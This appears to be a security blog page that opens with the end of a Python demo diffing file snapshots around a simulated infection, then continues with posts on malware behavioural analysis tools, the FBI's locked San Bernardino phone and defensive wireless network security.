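    # Helper for the constructed sample tree: create parent dirs, write one file.
    path = os.path.join(root, *parts)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, mode) as fh:
        fh.write(data)


def demo():
    """Build a constructed tree, simulate post-infection changes, diff the shots."""
    root = tempfile.mkdtemp()
    try:
        write(root, "Windows", "System32", "drivers", "etc", "hosts", data="127.0.0.1 localhost\n")
        write(root, "Users", "victim", "notes.txt", data="quarterly report\n")
        before = snapshot(root)  # first shot: clean baseline
        # Constructed post-infection changes (not real malware behaviour):
        # a dropped binary, an appended hosts entry and a deleted user file.
        write(root, "Windows", "Temp", "dropped.exe", data=b"MZ" + b"\0" * 62, mode="wb")
        write(root, "Windows", "System32", "drivers", "etc", "hosts",
              data="127.0.0.1 av-updates.example\n", mode="a")
        os.remove(os.path.join(root, "Users", "victim", "notes.txt"))
        after = snapshot(root)  # second shot: after the specimen ran
        return diff_snapshots(before, after)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

Hashing every file on a real system is slow; in practice you would restrict the walk to the directories Regshot would watch (system, temp and user profile paths) and pair the result with a Registry export diff.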

An Administrator who has gained a sense of the key capabilities of the malicious executable may seek to discover details of the Malware’s characteristics through code analysis. There are disassemblers, debuggers and memory dumpers freely available that will assist with the process of reverse engineering the malicious executable.

Malware Behavioral Analysis

Behavioral analysis of the Malware specimen we have isolated allows an Administrator to figure out what the Malware has done and what it is capable of doing as it interacts with its environment. When we are subject to a Malware attack, we can see whether it maintains contact with an attacker, what actions it performs within an infected system and how it spreads. Analyzing the Malware in a controlled (isolated) environment can answer our IR questions and guide the IR team to the proper response.

In the case of zero-day infections, for which no antivirus signatures yet exist, the IR team has a virus loose on the system or the network performing tasks contrary to operations while the Administrators do not really know what it is doing. Until the antivirus software receives an up-to-date signature, it will not remove the Malware. We must take precautions to isolate the malware-analysis lab from the production network, to mitigate the risk that a malicious program will escape and infect the operations environment.

Online Malware Analysis Tools

Many websites can assist in performing malware analysis. The overwhelming amount of malware we are inundated with, and the destructive nature of what it does, has made people appreciate the value of malware analysis, and many sites will perform the analysis for you.

The first website we will mention is “Virus Total”. It is a community-driven website that allows you to upload a file and have “Virus Total” analyze it. The site will tell you whether the upload is a piece of malware, identify it by name or class, and give you some understanding of what that malware has done or can do, so that the user better understands what they are dealing with.

A second website I would like to mention is “Cuckoo”. It gives you the ability to perform an analysis from file properties and from a hash of the file. “Virus Total” looks at the characteristics of the file that has been uploaded. “Cuckoo” will actually run the software for you and capture what is going on in real time.

This is actually done in a very safe environment. It performs these actions through the use of virtual machines. “Cuckoo” automates the process with virtual machines running the executable malware so we can actually see what is going on in the machine or on the network. Basically, “Cuckoo” is a virtual sandbox that allows us to observe and analyze malware.

There are other websites that perform free automated behavioral analysis (malware analysis) on compiled Windows executables (that an Administrator may supply). The primary difference is each website employs a different analysis technology on the back end. The advantage for the Administrator (who is submitting the executable) is that it broadens the field of analysis on the executable. These tools include:

  • Anubis
  • BitBlaze
  • Comodo (Automated Analysis System)
  • EUREKA
  • Malwr
  • ThreatExpert

Conclusion

When we have software that is being used for malicious purposes, the Administrator needs to understand what is happening on the systems or network. The Administrator needs to know what damage this piece of executable software has introduced into the network, so we can determine what contingency to undertake to correct the problem. The Administrator can also figure out what is needed to protect the network or to recover from the malicious activity carried out by the malware that was introduced into operations.


FBI Still Can’t Access San Bernardino Shooter’s Encrypted Phone

Although the phone has been taken as evidence, there is still no way to find out what information it holds due to the encryption key that only the owner can unlock.

The FBI still cannot unlock the encrypted cellphone of one of the San Bernardino shooters more than two months after the California terrorist attack.

FBI Director James Comey told the Senate Intelligence Committee on Tuesday that his agency’s inability to access the information in the retrieved phone is an example of the effect on law enforcement of the growing use of encryption technology.

Comey said the problem of “going dark” is overwhelmingly affecting law enforcement at all levels.

“It affects cops and prosecutors and sheriffs and detectives trying to make murder cases, car accident cases, kidnapping cases, drug cases,” Comey said.

He said the biggest concern was phones that automatically locked and secured all information inside.

“It is a big problem for law enforcement armed with a search warrant, when you find a device that can’t be opened even when a judge said there’s probable cause to open it,” Comey said.

Sen. Dianne Feinstein of California, the ranking Democrat on the committee, and the committee’s chairman, Sen. Richard Burr, R-N.C., have said they are considering legislation that would compel manufacturers to provide law enforcement access to encrypted data when there’s a court order. Industry associations have opposed such proposals.

While encryption issues are more common in local criminal cases, counterterrorism investigations are also affected, Comey said. He cited the December attack in San Bernardino, in which Syed Rizwan Farook and Tashfeen Malik killed 14 people at a holiday party.

“In San Bernardino, a very important investigation to us, we still have one of those killers’ phones that we have not been able to open. It’s been over two months now; we’re still working on it,” Comey said.

Comey previously told Congress that investigators could not read more than 100 text messages that one of the shooters who attacked a cartoon contest in Garland, Texas, last year exchanged with an “overseas terrorist.” The contest was to draw caricatures of the Prophet Muhammad.

Privacy advocates who oppose limits on encryption argue that giving such backdoor access to data opens devices to thieves and hackers. A recent report from Harvard University’s Berkman Center for Internet and Society concluded that law enforcement fears of encryption are exaggerated, in part because increasingly sophisticated technology is opening up other ways for police to conduct surveillance.

National Intelligence Director James Clapper told the senators that he thinks the government and tech companies should be able to work out a solution without resorting to legislation.

“I’m not sure we’ve exhausted all the possibilities here technologically,” Clapper said.

Adm. Michael Rogers, director of the National Security Agency, said “encryption is foundational to the future.” The challenge, he said, is finding the balance between privacy and security.

Security for Wireless Devices

This subject of securing wireless devices conjures up visions of your PC or mobile phone connecting to the Internet through some hotspot at Starbucks. But it is so much more than that. Let’s look at the facts:

  • Even back in 2013, 98 percent of U.S. small businesses used wireless technologies in their operations according to an AT&T poll.
  • The Internet of Things (IoT) is rapidly expanding, and it is based firmly on wireless. For example, many home and office security systems are wireless.
  • Mobile phones are becoming the main avenue to the Internet for an increasing number of people all over the world.

So it makes sense that wireless security should be a big concern.

Wireless technologies are more vulnerable than wired technologies

Keep in mind that many businesses have wired and wireless networks. Wireless devices are vulnerable to any attacks that may be made on wired devices. But there are many more threats to wireless networks. This is because wireless transmits data over the air. The air cannot be secured. So wireless technologies must incorporate more safeguards against eavesdropping and man-in-the-middle attacks than wired technologies.

For example, man-in-the-middle attacks in a wireless environment are child’s play. An attacker connects to the Internet and configures a laptop to look like a legitimate wireless access point (AP). Victims wanting Internet access unwittingly connect through the bogus AP. Furthermore, the attacker can launch a de-authentication attack, causing devices already connected to a legitimate AP to drop their connection and to automatically reconnect to the attacker’s AP. The attacker now has unlimited access to data transmitted by any attached user since wireless operates at Layer 2. Layer 3 protections such as encryption, network authentication, and virtual private networks (VPNs) cannot protect against this scenario.

Two wireless devices can communicate without involving the access point. This is clearly not a possibility in the wired world. So not only must there be protection against external threats, but also against other devices attached to the AP.

Denial of Service attacks are a danger to any network, but especially with the restricted bandwidth of wireless networks.

Wireless Security measures that don’t work

Some sources recommend wireless security measures that are not effective for business. Here are three examples:

  1. Most wireless configurations provide MAC filtering. Here, an administrator enters a list of the MAC addresses (Layer 2 addresses) of authorized devices. A device with a MAC address that is not on the list is blocked. But any attacker with sniffing software can easily find authorized MAC addresses, since MAC addresses in Layer 2 headers are not encrypted. The attacker simply changes his own MAC address, via widely available software, to an authorized address, and he’s “in”.
  2. In setting up a wireless network connection, there is normally an option to hide the SSID (Service Set Identifier). This keeps the connection from appearing on a list, but does not prevent anyone from using the connection.
  3. Static IP addressing stops attackers from being assigned DHCP addresses. It does not block a knowledgeable attacker.

Recommended strategies to implement a wireless network

There are different approaches depending on the size of the organization and the level of in-house IT expertise:

  1. Create a completely isolated wireless network: Users must authenticate and have acceptable security software before they can connect to the Internet or, for that matter, to any local network resources. This approach requires a Network Access Server.
  2. Forward all web traffic to a proxy server which provides authentication and authorization.
  3. Require users to access resources through a virtual private network (VPN). VPNs provide encryption from the user’s location to the destination router (remote-access VPNs) or from the user’s router to the destination router (site-to-site VPNs). There are numerous implementations of VPNs including PPTP, L2TP, IPsec, and SSH.

Using end-to-end encryption would be ideal. However, not all intervening software and hardware may support encryption. For example, not all web sites offer HTTPS, and even if they do, the browser sends out IP addresses in clear text. The next best alternative is to require users to connect to the company network through VPNs.

Of course, authentication is critical. IEEE 802.11i Wi-Fi Protected Access II (WPA2) should be used. For authentication, there are alternatives:

  • Pre-shared key (PSK) – This is normally used only in a home environment and provides Advanced Encryption Standard (AES) encryption.
  • EAPOL (Extensible Authentication Protocol over LANs) with 802.1X and an authentication server such as RADIUS or DIAMETER: There are open-source RADIUS servers that could easily accommodate the needs of most businesses.
  • EAPOL with EAP-TLS: The majority of implementations require client-side X.509 certificates.

A hardware or software card or token can be used in combination with the above authentication techniques, depending on the vendor.

Finally…

Educate your users about the dangers of using public wireless. Be aware of “shoulder surfing” in public wireless areas. An attacker doesn’t necessarily have to be a computer genius.